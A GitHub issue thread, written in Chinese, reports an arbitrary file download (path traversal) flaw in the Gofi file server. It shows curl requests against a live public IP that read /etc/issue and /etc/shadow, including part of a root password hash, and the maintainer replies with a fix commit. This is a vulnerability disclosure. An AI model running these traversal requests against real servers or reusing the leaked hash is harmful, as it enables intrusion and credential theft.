### ISSUE TITLE
任意文件下载 

### ISSUE THREAD

**Issue by leis1** [Sloaix/Gofi#1]
任意文件下载 权限太高了 
http://129.226.186.76/api/download?path=../../../etc/passwd

curl http://129.226.186.76/api/download\?path\=../../../../etc/issue
Ubuntu 16.04.1 LTS \n \l

curl http://129.226.186.76/api/download\?path\=../../../../etc/shadow
root:$6$8jFcAk07$dZc99NqV8EtKk8mH53Ayi8gS8JhejmWemtppqCmC2Z0yj7vfMXxXrDMf

**Comment by Sloaix** [comment]
😂收，目前主要是放局域网的，安全这块没怎么处理。

**Comment by Sloaix** [comment]
fixed: https://github.com/Sloaix/Gofi/commit/4a3c1f3cb158fc55dd98854c21cc0bf0b2745f30
